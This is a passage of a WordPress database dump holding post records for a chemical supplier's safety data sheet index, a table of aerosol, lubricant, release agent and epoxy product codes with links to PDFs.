INSERT INTO `wp_posts` VALUES (1855, 2, '2016-09-20 17:13:52', '2016-09-20 17:13:52', '', 'MS-907 Two-Part Epoxy Adhesive', '', 'inherit', 'open', 'closed', '', 'ms-907-2', '', '', '2016-11-24 03:49:18', '2016-11-24 03:49:18', '', 1149, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-907.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1856, 2, '2016-09-20 17:15:29', '2016-09-20 17:15:29', '', 'ms-538', '', 'inherit', 'open', 'closed', '', 'ms-538-2', '', '', '2016-09-20 17:15:29', '2016-09-20 17:15:29', '', 1836, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-538.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1857, 2, '2016-09-20 17:16:40', '2016-09-20 17:16:40', '', 'electrical-contact-lubricant-2', '', 'inherit', 'open', 'closed', '', 'electrical-contact-lubricant-2', '', '', '2016-09-20 17:16:40', '2016-09-20 17:16:40', '', 1836, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/electrical-contact-lubricant-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1858, 2, '2016-09-20 17:26:00', '2016-09-20 17:26:00', '', 'ms-720l', '', 'inherit', 'open', 'closed', '', 'ms-720l-2', '', '', '2016-09-20 17:26:00', '2016-09-20 17:26:00', '', 1707, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-720L.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1859, 2, '2016-09-20 17:46:03', '2016-09-20 17:46:03', '<h1>Miller-Stephenson SDS database.</h1>\r\nIf you are unable to locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 800-992-2424 (8-4 E.T.)\r\n<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Liquid</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Release Agents</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Conformal Coatings</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Krytox</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Epoxy</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-124H</td>\r\n<td style="text-align: center;">MS-111</td>\r\n<td style="text-align: center;">MS-122AD</td>\r\n<td style="text-align: center;">MS-452N</td>\r\n<td style="text-align: center;">AGL 683</td>\r\n<td style="text-align: center;">MS-900</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222L</td>\r\n<td style="text-align: center;">MS-114C</td>\r\n<td style="text-align: center;">MS-122AD RED</td>\r\n<td style="text-align: center;">MS-460H</td>\r\n<td style="text-align: center;">AT</td>\r\n<td style="text-align: center;">MS-905 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222N</td>\r\n<td style="text-align: center;">MS-115</td>\r\n<td style="text-align: center;">MS-122ADL</td>\r\n<td style="text-align: center;">MS-462H</td>\r\n<td style="text-align: center;">ATA</td>\r\n<td style="text-align: center;">MS-905 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222T</td>\r\n<td style="text-align: center;">MS-182SD</td>\r\n<td style="text-align: center;">MS-122AV</td>\r\n<td style="text-align: center;">MS-465C</td>\r\n<td style="text-align: center;">AUT 2A45</td>\r\n<td style="text-align: center;">MS-907 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222F</td>\r\n<td style="text-align: center;">MS-126H</td>\r\n<td style="text-align: center;">MS-122E</td>\r\n<td style="text-align: center;">MS-467C</td>\r\n<td style="text-align: center;">AUT 523</td>\r\n<td style="text-align: center;">MS-907 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242L</td>\r\n<td style="text-align: center;">MS-126HUV</td>\r\n<td style="text-align: center;">MS-122E RED</td>\r\n<td style="text-align: center;">MS-470C</td>\r\n<td style="text-align: center;">AUT 1045</td>\r\n<td style="text-align: center;">MS-908 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242L-AS</td>\r\n<td style="text-align: center;">MS-383A</td>\r\n<td style="text-align: center;">MS-122SE</td>\r\n<td style="text-align: center;">MS-472C</td>\r\n<td style="text-align: center;">AUT 2045</td>\r\n<td style="text-align: center;">MS-908 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242N</td>\r\n<td style="text-align: center;">MS-383H</td>\r\n<td style="text-align: center;">MS-122SD</td>\r\n<td style="text-align: center;">MS-470S</td>\r\n<td style="text-align: center;">AUT 2245</td>\r\n<td style="text-align: center;">MS-910 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242N-AS</td>\r\n<td style="text-align: center;">MS-383HUV</td>\r\n<td style="text-align: center;">MS-122XD</td>\r\n<td style="text-align: center;">MS-472S</td>\r\n<td style="text-align: center;">143 SERIES</td>\r\n<td style="text-align: center;">MS-910 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381H</td>\r\n<td style="text-align: center;">MS-252</td>\r\n<td style="text-align: center;">MS-132FE</td>\r\n<td style="text-align: center;">MS-475C</td>\r\n<td style="text-align: center;">GPL 10X SERIES</td>\r\n<td style="text-align: center;">HELOXY 48</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HM</td>\r\n<td style="text-align: center;">MS-257</td>\r\n<td style="text-align: center;">MS-136W</td>\r\n<td style="text-align: center;">MS-477C</td>\r\n<td style="text-align: center;">GPL 246</td>\r\n<td style="text-align: center;">HELOXY 61</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HUV</td>\r\n<td style="text-align: center;">MS-262</td>\r\n<td style="text-align: center;">MS-143AX</td>\r\n<td style="text-align: center;">G0831B</td>\r\n<td style="text-align: center;">GPL 255</td>\r\n<td style="text-align: center;">HELOXY 62</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HMUV</td>\r\n<td style="text-align: center;">MS-282</td>\r\n<td style="text-align: center;">MS-143E</td>\r\n<td style="text-align: center;">Y0110A</td>\r\n<td style="text-align: center;">157FS</td>\r\n<td style="text-align: center;">HELOXY 67</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HC</td>\r\n<td style="text-align: center;">MS-532</td>\r\n<td style="text-align: center;">MS-143E-1</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 20X SERIES</td>\r\n<td style="text-align: center;">HELOXY 68</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HCM</td>\r\n<td style="text-align: center;">MS-539</td>\r\n<td style="text-align: center;">MS-143E-2</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 21X SERIES</td>\r\n<td style="text-align: center;">HELOXY 71</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HCUV</td>\r\n<td style="text-align: center;">MS-552</td>\r\n<td style="text-align: center;">MS-143E-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 22X SERIES</td>\r\n<td style="text-align: center;">HELOXY 107</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HCMUV</td>\r\n<td style="text-align: center;">MS-557</td>\r\n<td style="text-align: center;">MS-143E-10</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 226FG, 227FG</td>\r\n<td style="text-align: center;">HELOXY 116</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-250</td>\r\n<td style="text-align: center;">MS-562</td>\r\n<td style="text-align: center;">MS-143E BLUE</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">240 SERIES</td>\r\n<td style="text-align: center;">HELOXY 505</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-250M</td>\r\n<td style="text-align: center;">MS-582</td>\r\n<td style="text-align: center;">MS-143E RED</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">250 SERIES</td>\r\n<td style="text-align: center;">BISPHENOL A-157</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-250SP</td>\r\n<td style="text-align: center;">MS-702</td>\r\n<td style="text-align: center;">MS-143H</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">280 SERIES</td>\r\n<td style="text-align: center;">EPON RESIN 164</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-255</td>\r\n<td style="text-align: center;">MS-722</td>\r\n<td style="text-align: center;">MS-143H-1</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">283 SERIES</td>\r\n<td style="text-align: center;">EPON RESIN SU 8</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-255M</td>\r\n<td style="text-align: center;">MS-727</td>\r\n<td style="text-align: center;">MS-143H-2.5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 29X SERIES</td>\r\n<td style="text-align: center;">EPON RESIN 813</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-260</td>\r\n<td style="text-align: center;">MS-732</td>\r\n<td style="text-align: center;">MS-143H-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 407</td>\r\n<td style="text-align: center;">EPON RESIN 815C</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-260M</td>\r\n<td style="text-align: center;">MS-739</td>\r\n<td style="text-align: center;">MS-143H-10</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EG 2000, 3000</td>\r\n<td style="text-align: center;">EPON RESIN 825</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-280</td>\r\n<td style="text-align: center;">MS-747</td>\r\n<td style="text-align: center;">MS-143H BLUE</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">FPG SERIES</td>\r\n<td style="text-align: center;">EPON RESIN 826</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-530</td>\r\n<td style="text-align: center;">MS-752</td>\r\n<td style="text-align: center;">MS-143H RED</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">LINEAR GREASE</td>\r\n<td style="text-align: center;">EPON RESIN 828</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-538</td>\r\n<td style="text-align: center;">MS-752U</td>\r\n<td style="text-align: center;">MS-143 TE</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">LINEAR OIL</td>\r\n<td style="text-align: center;">EPON RESIN 830</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-550</td>\r\n<td style="text-align: center;">MS-757</td>\r\n<td style="text-align: center;">MS-143XD</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">LVP</td>\r\n<td style="text-align: center;">EPON RESIN 834</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-555</td>\r\n<td style="text-align: center;">MS-762</td>\r\n<td style="text-align: center;">MS-143XD-1</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8990</td>\r\n<td style="text-align: center;">EPON RESIN 862</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-560</td>\r\n<td style="text-align: center;">MS-767</td>\r\n<td style="text-align: center;">MS-143XD-2</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8906A</td>\r\n<td style="text-align: center;">EPON RESIN 872</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-580</td>\r\n<td style="text-align: center;">MS-772</td>\r\n<td style="text-align: center;">MS-143XD-2.5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8908</td>\r\n<td style="text-align: center;">EPON RESIN 1001F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-700</td>\r\n<td style="text-align: center;">MS-777</td>\r\n<td style="text-align: center;">MS-143XD-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8950</td>\r\n<td style="text-align: center;">EPON RESIN 1002F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-700M</td>\r\n<td style="text-align: center;">MS-782</td>\r\n<td style="text-align: center;">MS-143XD-10</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8980</td>\r\n<td style="text-align: center;">EPON RESIN 1004F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-720</td>\r\n<td style="text-align: center;">MS-787</td>\r\n<td style="text-align: center;">MS-145W</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT GREASE</td>\r\n<td style="text-align: center;">EPON RESIN 1007F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-720M</td>\r\n<td style="text-align: center;">MS-797</td>\r\n<td style="text-align: center;">MS-145W-4</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PFPE OIL W/SOLUBLE ADDITIVE</td>\r\n<td style="text-align: center;">EPON RESIN 1031</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-720L</td>\r\n<td style="text-align: center;">MS-110XB</td>\r\n<td style="text-align: center;">MS-153BN</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PFPE GREASE SOLUBLE ADDITIVE</td>\r\n<td style="text-align: center;">EPON RESIN 1050</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-725</td>\r\n<td style="text-align: center;">MS-1010</td>\r\n<td style="text-align: center;">A0305B</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PFPE OILS</td>\r\n<td style="text-align: center;">EPON RESIN 1163</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-725M</td>\r\n<td style="text-align: center;">MS-2010</td>\r\n<td style="text-align: center;">K1206A</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">TS4 SEALANT</td>\r\n<td style="text-align: center;">EPON RESIN 8021</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-730</td>\r\n<td style="text-align: center;">MS-31XXMD</td>\r\n<td style="text-align: center;">Y0717A</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VACUUM PUMP FLUID</td>\r\n<td style="text-align: center;">EPON RESIN 8132</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-730M</td>\r\n<td style="text-align: center;">MS-32XXMD</td>\r\n<td style="text-align: center;">Vydax NRT 960</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VACUUM PUMP FLUID XP</td>\r\n<td style="text-align: center;">EPON RESIN 8280</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-730L</td>\r\n<td style="text-align: center;">X-P35</td>\r\n<td style="text-align: center;">RA/IPA-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-500AF</td>\r\n<td style="text-align: center;">EPON RESIN 8281</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-738</td>\r\n<td style="text-align: center;">H0805B</td>\r\n<td style="text-align: center;">RA/IPA-15</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-OILS</td>\r\n<td style="text-align: center;">EPON RESIN 58005</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-738M</td>\r\n<td style="text-align: center;">H1112B</td>\r\n<td style="text-align: center;">DryFilm RA/IPA</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-AC, ACX</td>\r\n<td style="text-align: center;">EPON RESIN 58034</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-745</td>\r\n<td style="text-align: center;">Vertrel SDG</td>\r\n<td style="text-align: center;">DryFilm RA</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-BD, BDX, BDZ</td>\r\n<td style="text-align: center;">EPONEX 1510</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-750</td>\r\n<td style="text-align: center;">Vertrel SFR</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-S, SX, SZ</td>\r\n<td style="text-align: center;">EPI-REZ WD-510</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-750M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 2E SERIES</td>\r\n<td style="text-align: center;">EPI-REZ 3522-W-60</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-755</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PCA,PRO,SG</td>\r\n<td style="text-align: center;">EPI-REZ 5003-W-55</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-755M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPI-REZ 5520-W-60</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-755L</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPI-REZ 5522-WY-55</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-760</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3015</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-760M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3046</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-765</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3055</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-770</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3115</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-770M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3125</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-775</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3140</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-775M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-780</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3164</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-780M</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3223</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-795</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3234</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-795M</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3245</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-110X</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3253</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-120X</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3270</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-120X-XP</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3271</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">H0805A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3274</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">J0912A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3282</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">K0725A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3290</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">K1016A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3295</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">CURING AGENT W</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">ANCAMINE K54</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">ANCAMINE K61B</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">BDMA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">BF3-400</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">DEAPA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">NMA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">VERSAMID 115</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">VERSAMID 125</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VERSAMID 140</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2016-09-20 17:46:03', '2016-09-20 17:46:03', '', 1842, 'https://132.148.10.86/wordpress/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1860, 2, '2016-09-20 17:51:48', '2016-09-20 17:51:48', '<h1>Miller-Stephenson SDS database.</h1>\r\nIf you are unable to locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 800-992-2424 (8-4 E.T.)\r\n<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Liquid</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Release Agents</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Conformal Coatings</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Krytox</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Epoxy</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/124H.pdf">MS-124H</a></td>\r\n<td style="text-align: center;">MS-111</td>\r\n<td style="text-align: center;">MS-122AD</td>\r\n<td style="text-align: center;">MS-452N</td>\r\n<td style="text-align: center;">AGL 683</td>\r\n<td style="text-align: center;">MS-900</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/222L.pdf">MS-222L</a></td>\r\n<td style="text-align: center;">MS-114C</td>\r\n<td style="text-align: center;">MS-122AD RED</td>\r\n<td style="text-align: center;">MS-460H</td>\r\n<td style="text-align: center;">AT</td>\r\n<td style="text-align: center;">MS-905 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/222N.pdf">MS-222N</a></td>\r\n<td style="text-align: center;">MS-115</td>\r\n<td style="text-align: center;">MS-122ADL</td>\r\n<td style="text-align: center;">MS-462H</td>\r\n<td style="text-align: center;">ATA</td>\r\n<td style="text-align: center;">MS-905 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/222N.pdf">MS-222T</a></td>\r\n<td style="text-align: center;">MS-182SD</td>\r\n<td style="text-align: center;">MS-122AV</td>\r\n<td style="text-align: center;">MS-465C</td>\r\n<td style="text-align: center;">AUT 2A45</td>\r\n<td style="text-align: center;">MS-907 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/222N.pdf">MS-222F</a></td>\r\n<td style="text-align: center;">MS-126H</td>\r\n<td style="text-align: center;">MS-122E</td>\r\n<td style="text-align: center;">MS-467C</td>\r\n<td style="text-align: center;">AUT 523</td>\r\n<td style="text-align: center;">MS-907 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/242L.pdf">MS-242L</a></td>\r\n<td style="text-align: center;">MS-126HUV</td>\r\n<td style="text-align: center;">MS-122E RED</td>\r\n<td style="text-align: center;">MS-470C</td>\r\n<td style="text-align: center;">AUT 1045</td>\r\n<td style="text-align: center;">MS-908 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/242NAS.pdf">MS-242L-AS</a></td>\r\n<td style="text-align: center;">MS-383A</td>\r\n<td style="text-align: center;">MS-122SE</td>\r\n<td style="text-align: center;">MS-472C</td>\r\n<td style="text-align: center;">AUT 2045</td>\r\n<td style="text-align: center;">MS-908 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/242N.pdf">MS-242N</a></td>\r\n<td style="text-align: center;">MS-383H</td>\r\n<td style="text-align: center;">MS-122SD</td>\r\n<td style="text-align: center;">MS-470S</td>\r\n<td style="text-align: center;">AUT 2245</td>\r\n<td style="text-align: center;">MS-910 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/242NAS.pdf">MS-242N-AS</a></td>\r\n<td style="text-align: center;">MS-383HUV</td>\r\n<td style="text-align: center;">MS-122XD</td>\r\n<td style="text-align: center;">MS-472S</td>\r\n<td style="text-align: center;">143 SERIES</td>\r\n<td style="text-align: center;">MS-910 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/381H.pdf">MS-381H</a></td>\r\n<td style="text-align: center;">MS-252</td>\r\n<td style="text-align: center;">MS-132FE</td>\r\n<td style="text-align: center;">MS-475C</td>\r\n<td style="text-align: center;">GPL 10X SERIES</td>\r\n<td style="text-align: center;">HELOXY 48</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/381H.pdf">MS-381HM</a></td>\r\n<td style="text-align: center;">MS-257</td>\r\n<td style="text-align: center;">MS-136W</td>\r\n<td style="text-align: center;">MS-477C</td>\r\n<td style="text-align: center;">GPL 246</td>\r\n<td style="text-align: center;">HELOXY 61</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/381HUV.pdf">MS-381HUV</a></td>\r\n<td style="text-align: center;">MS-262</td>\r\n<td style="text-align: center;">MS-143AX</td>\r\n<td style="text-align: center;">G0831B</td>\r\n<td style="text-align: center;">GPL 255</td>\r\n<td style="text-align: center;">HELOXY 62</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/381HUV.pdf">MS-381HMUV</a></td>\r\n<td style="text-align: center;">MS-282</td>\r\n<td style="text-align: center;">MS-143E</td>\r\n<td style="text-align: center;">Y0110A</td>\r\n<td style="text-align: center;">157FS</td>\r\n<td style="text-align: center;">HELOXY 67</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/381HC.pdf">MS-381HC</a></td>\r\n<td style="text-align: 